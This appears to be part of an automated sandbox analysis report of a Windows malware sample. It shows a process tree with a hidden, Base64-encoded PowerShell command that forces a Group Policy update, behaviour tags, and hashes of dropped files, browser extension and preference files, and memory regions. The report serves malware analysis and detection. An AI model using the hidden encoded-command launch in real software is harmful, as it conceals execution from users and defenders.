                                                                                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:1060
                                                                                                                                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:1400
                                                                                                                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:1140
                                                                                                                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:1312
                                                                                                                                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:2976

                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                        • C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\vFloWYX.xml

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          60374ded0c3bcaf757264550a8dc899a

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          8611e859d5b871f5166a1403fe7ba1571b05ef68

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          7f9e83652029fd8b60f388ba6608e906bdaa8a893190567278c4c0d297cb4156

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          4eed6f0bea7cb9196ac5a8afcbe3cfff196e9720c52e4cf9c7a7c368a8ee57d7737b8123e05cafb80be73026395743f63924c0ab7bf2db78f48dc5b81ac34c7e

                                                                                                                                                                                                                        • C:\Program Files (x86)\QtKEgKYoTGTqC\zKIdGvm.xml

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          388e3efd8d9f8ed17912b945fc3dfaed

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          1a9d265e2ffd75db1672289989d45eafe1bd914e

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          c44513df90c9ac0192c9632bd2fbe066b1e561e707e21fc336b6b12a600d6d97

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          d3044cb64ce6c7fa0fe2b1c40254e6038eeb0e0d69e11bc9e8975d3f38bd907fec4807c52adc36de7b949409275ad3f06429f8de88b15f785cd69d73152ebb57

                                                                                                                                                                                                                        • C:\Program Files (x86)\dlfHiRefefjU2\MrbggDq.xml

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          7133cbfbc466f3cba660ecded4d14fab

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          dcc4ec90aee7327755b6bd73ea8e93a03b278663

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          51d5f16b5c615cc1724c89a09bd4738ff1e40b81919cecb67ac3cc6852885ba2

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          516dba2b83ea2bc679b635f73d836d8cd3814051a365b217abc567890fbbcda1330b7f48d477bcce810f7a5e8eb6ed69b0b08e514b67b94a4862be5e0a1fce78

                                                                                                                                                                                                                        • C:\Program Files (x86)\hsUwQAlMU\hJTohrj.xml

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          5b2353ae21efad463ed2b670b25d495d

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          0d06dca75d16435d6649a0b727e9fee19c54c439

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          828e57714080116baf8475e036e1a30c8f982567b4a8a56bbccc0dd33c4ef20b

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          0c8261ab946c26e1cb9e9ddc6d4ea3030615cc6f9e41f013a72769f451ac1d7e08a855ab473e10d99ff9bbd64e6b61ebac18f0d37ee547f8c40008ea45c63855

                                                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2.0MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          aba320adc551da717e47ce892b020da8

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          8eca8ab1f6f6cf77aa1f172f040c3cc6d18c3d56

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          685a78eb1da4048ef237b54d27fbfdca856e2a2f10c8ebea9f2ea333d0ee49f3

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          615c66dcdbe010bc9eee556311b68e05989814c045c203c8a310911a99510ebc2659c27c39119a89d161963ec3d196b9918579aead72b83f2347bed540f7cd48

                                                                                                                                                                                                                        • C:\ProgramData\nivjmgppGaMJQQVB\prQdquS.xml

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          0f2783090b0b353283d2b9057f337666

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          0cb004b706dac27acb076680a8a581230489d0cd

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          07f90e8a00083e3d13296f15ab51fe0e56eb48c2bfa4cecb6977bdb766df64ef

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          3281662c4556d9c5f1cc9feb66b235e6c4f7a04f82feb0c06b5027865861e9117de7ad159aa5984960cd8b9d1352ff635c44e3fb7c840e51b8baf82a27c2f200

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          187B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          136B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          150B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          10KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          4be91abc007dfae3c035be23055993e3

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          cabb8f8b46bac60855b90d064241b80ff22edebf

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          907b0d54a8b9907e2ec0e0c7ee9aeaea03a327bc9932d3145bd257c28a77fbeb

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          f52a1fd4b87e5ea87958f469b37dcc91076e2b38c8dc35c3dab1c27d29aaa0dd1243d2dcf9522e0fb3a15487cfa9f586fe47abcb8ccef0769290f20e0f3acf94

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          27KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          42443e7403e8573c30c07839872096dd

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          2004de9473a8f26ac56c2bcbc788ff78951a0bd2

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          27cc4136d51e147079a15952598b9364bb27b43ce6ce7a0427dfe7a0d3019264

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          745bf79a76afd8a289aa692f382d1ef213847fc50bcab7c348d51517ae8c6e98c777568f35c285bb2543d447dbfa2b551f35df70f689ca18a891d6c64e63725c

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          7KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          c1068039cc2f5eb734faeded082ec439

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          2f2cad412d977964545191356436358ecad066c8

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          3ddb34a4213500bb76db222e869ac086d6e9350604bd2d8ec79b9f5c31f842d6

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          7494f1814cf273d2b2a8ae616e5ca400b944b063741679a8077bf07c41e8f2322271250dd77dad4f2be4dcfa73b861c897316149628aaaed30a13640081a2f06

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          7KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          13955283515fa8e1544fdca8af656115

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          51e0a127ed39c5bfa0442c78ea523f441decc7ba

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          7f7db3408e70018fe04ce6935d294bd2f8d793d1f496ad6686c8758d3c8954cc

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          6b8f5c29b9f2b1b394de5e95bd61f932f9ebdedaceb6d719042b87b2a9bd4e96543e9cffe9f880c2a947993f026aa098d5f772e2dddb1bfe499d6939866c0ca5

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          7KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          5bb510889703f63a974bb347e58cff09

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          c2471fc965eabe2c651a4c0a2f1028ded6d0e4a0

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          785781827d7130a48a18dba91be27ee6a81b67fbed6ee63f38d4c4773e9e8c58

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          1cd9fa3b46e36850b1541e938b0cd57b81cae8673018ef1a0d4d439d8c03a09c83fb04676b872bae033b83f829689b94d6202d2fde5cdd00f708bf873e1a5eff

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9bot8sq2.default-release\prefs.js

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          6KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          da4c91eb30753946ef0134f59d036f74

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          d782603080ccdd8007a22718d545850fc7e29ff3

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          9c822026cb526f1e7f2fbaf89c0c6bfd05440bf3ac5616dc54a816ab78ec172c

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          a9a3a0895c0083df3b9e78898d6169fec55cbf10bd972192e2587a1779e4f3e6597819eb280a5ecaab6a6d9776c0e2fe0833c97822730e7ed2f877883cc4a178

                                                                                                                                                                                                                        • C:\Windows\Temp\QqEAMUespgTHJnVz\GGHPVGXy\QsmiPNz.dll

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          6.5MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          21e3965bd08eabf0ee24dd9d17dc0d5c

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          8680d90f50ed3caf0b617a1cf512c664bdbd7be8

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          570e0b2d996c3151a08c5042555500988b7eca34c2126d335e06da13ce772f4a

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          9b5662e11db22c04c3f4463e493c28b5ef2a7a997e644a6cad8f38d8df2947f8f14b049d0d2136b4e98a53db9db94c5a2ff613b8cdbaa2c7107a46f855c81a3e

                                                                                                                                                                                                                        • C:\Windows\Temp\QqEAMUespgTHJnVz\fZNkQiVY\ODYHBdNCcqPVDlYF.wsf

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          9KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          60fc8591c9486164f9413bf45118fa91

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          150da91e999d5a671f3cf85b6703d11e6d29dbfe

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          8e1305cd4216f8e23da0b57eb6a036498cdb96a25454f4d6a796e926fd9d9a09

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          c68d978efdcae4d365d011bb37c82976f4d10d65e67020fa73409ce65606e522651862e5e74e4fe4f707f665d0e22c5bccc20b0d2e78fa45482e43e1a2db4093

                                                                                                                                                                                                                        • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          6KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          d97e18f6faed7d70e7513409a124f7a3

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          5ee122d68844e47bf7bb17920e626a8afbe1b7e2

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          f42326cf5b194f7811086906f8fb4c5753fd6a6f2be74211629d297caa34d3bd

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          4a4e692baf2737b7be14d38f24e5faed265f02d35087b0405e70f45e39615ddd17e015ae7bcda434ffe58b880a8edb15a60fee25ad1eb60cd98f85d629bb92a3

                                                                                                                                                                                                                        • \??\PIPE\srvsvc

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS25D8.tmp\Install.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          6.7MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          a5dca05edc6eda6e2acfe7ca41641cc5

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          b772813e63a424ae31a2bd75c0067be03aae0165

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          986e2f087fe32332daf7215461a103fa25d86209ab704e29a81dc419435367ae

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          c3d865918176c064e638d2c892cb2ef45bc722fa9f3b4e1fb10ca6886054ff2d37cd9fd97fff08cdd95a017374109495bf48069fdc67355b34729fae654da2ed

                                                                                                                                                                                                                        • memory/296-35-0x000000001B620000-0x000000001B902000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2.9MB

                                                                                                                                                                                                                        • memory/296-36-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          32KB

                                                                                                                                                                                                                        • memory/1600-108-0x00000000019E0000-0x0000000001A3D000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          372KB

                                                                                                                                                                                                                        • memory/1600-64-0x0000000010000000-0x00000000105CF000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          5.8MB

                                                                                                                                                                                                                        • memory/1600-75-0x0000000002370000-0x00000000023F5000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          532KB

                                                                                                                                                                                                                        • memory/1600-291-0x00000000025D0000-0x0000000002652000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          520KB

                                                                                                                                                                                                                        • memory/1600-301-0x0000000002DE0000-0x0000000002EBA000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          872KB

                                                                                                                                                                                                                        • memory/1752-45-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2.9MB

                                                                                                                                                                                                                        • memory/1752-46-0x0000000001E50000-0x0000000001E58000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          32KB

                                                                                                                                                                                                                        • memory/2016-324-0x0000000001340000-0x000000000190F000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          5.8MB

                                                                                                                                                                                                                        • memory/2104-27-0x0000000010000000-0x00000000105CF000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          5.8MB

                                                                                                                                                                                                                        • memory/2776-12-0x0000000010000000-0x00000000105CF000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          5.8MB